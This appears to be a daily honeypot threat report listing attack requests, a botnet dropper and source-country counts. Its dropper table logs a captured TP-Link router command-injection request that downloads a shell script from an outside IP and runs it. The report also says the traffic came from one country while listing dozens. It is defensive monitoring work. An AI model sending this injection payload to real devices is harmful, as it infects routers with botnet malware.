Daily Report: 2025-05-05#
Executive summary#
interaction report on http service of various Hhoneypot around the world.
- Executive summary
- OT report simplified
- Botnet dropper behaviour
- List of request
- List of country_iso_code
executive_summary#
In today’s repport, we detected 1 stage 1 IP address(es), linked to 1 dropper URL(s).
There are 4 new requests that have never been observed before (these were added to the monitored request database.).
A total of 1463 requests were recorded during the day, originating from 1 different countries, with a peak of 318 requests coming from BG.
ot_simplified_report#
simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.
source_country | targeted_country |
---|---|
US | Dubai |
botnet_dropper_behaviour#
remote_addr | request |
---|---|
45.95.147.209 | GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+sh%3B+wget+http%3A%2F%2F176.65.148.234%2Fsh%3B+chmod+777+sh%3B+.%2Fsh+tplink%3B+rm+-rf+sh%60) HTTP/1.1 |
request#
The list of requests presented here are those that have not yet been yet integrated into the request database.
number_of_occurence | request | |
---|---|---|
319 | 1 | \x00\x00\x00\xE0Z\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x05\x01=K\x00\x00\x01\x01\x11\x08\xA8\xC0\xD8C\xAEC\x95x/\x00admin\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x000\x81\x89\x02\x81\x81\x00\xCF2\x93u-\x97\x90\xA5Bm\xD6M\xBD\x7F\x15\x93\xE9\xB6\xA1\xADp\x14\x89\x1D\x09G\xE2’\x92%i+;\xC6}\xFD\xF6\xFD\xAD\x98\x81\x8Fg\x18\x19i)\xCF\x80}T\x22gK\xF3X\xAC\xBD\xC9\xB5w\x9A\xE1\x08\xD1\x907\xAFGY\x80\xD9\xE7p\xEA; |
325 | 1 | \x00\x00\x00\xE0Z\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x05\x01=K\x00\x00\x01\x01\x11\x08\xA8\xC0\xD8C\xAEC\x95x/\x00admin\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x000\x81\x89\x02\x81\x81\x00\xB6\x8A\x91\xE6\xA6\x09\xED\x837\xCAd’\xE6\xA7\xA4\xF0\x1BR |
329 | 1 | \x00\x00\x00\xE0Z\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x05\x01=K\x00\x00\x01\x01\x11\x08\xA8\xC0\xD8C\xAEC\x95x/\x00admin\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x000\x81\x89\x02\x81\x81\x00\xB4’\x0CS!$\x0C\xEC\x0Cz\x15\x87\x1C\xE8f\x0ELc\xC6k\x8Ax\xFDLD\xC5+\x01\x90\xFE\xF5@\xD7\x86N\xEA\xB3\x00\x1D\xC2`\xAC.\xBB,\xCE+\xC9E\x0Cq\x95\xD8=\x91\x869\xDB.\x81V\xC4jPgz\xC7\x9A\xA3\x08\xE4\x8Esb\xD1SV\x07\x8F\x1B\x81\x9D\x05\xCD\xD3\x9D_?\x08.IK\xF2F\x05\x88L\x03\xFE\x1C\x8A\xE1\x00/\xA8\x03\x1F\xFAW\x91o=h\xBB\xA0q\x05\x81/\xB9}r\x9E\xA4\xB6;\xE6\x85\x02\x03\x01\x00\x01 |
333 | 1 | \xA0\x05\x00`\x00\x00\x00\x00\xC4\xA3\xAFH\x99V\xB6\xB4\xC4\xA3\xAFH\x99V\xB6\xB4\x05\x02\x00\x01\x00\x00\xA1\xAA |
country_iso_code#
number_of_occurence | country_iso_code | |
---|---|---|
0 | 318 | BG |
1 | 308 | NL |
2 | 188 | US |
3 | 109 | DE |
4 | 100 | CN |
5 | 87 | GB |
6 | 61 | FR |
7 | 49 | VN |
8 | 48 | IN |
9 | 42 | PL |
10 | 33 | SC |
11 | 15 | KR |
12 | 12 | PT |
13 | 12 | AZ |
14 | 8 | CZ |
15 | 8 | AO |
16 | 7 | TR |
17 | 7 | UA |
18 | 6 | BE |
19 | 4 | CH |
20 | 4 | SG |
21 | 4 | LT |
22 | 4 | AE |
23 | 4 | CA |
24 | 4 | GH |
25 | 4 | SA |
26 | 3 | HU |
27 | 2 | RU |
28 | 2 | HK |
29 | 2 | ID |
30 | 1 | IT |
31 | 1 | IR |
32 | 1 | JP |
33 | 1 | RO |
34 | 1 | NZ |
35 | 1 | MC |
36 | 1 | TH |
37 | 1 | EE |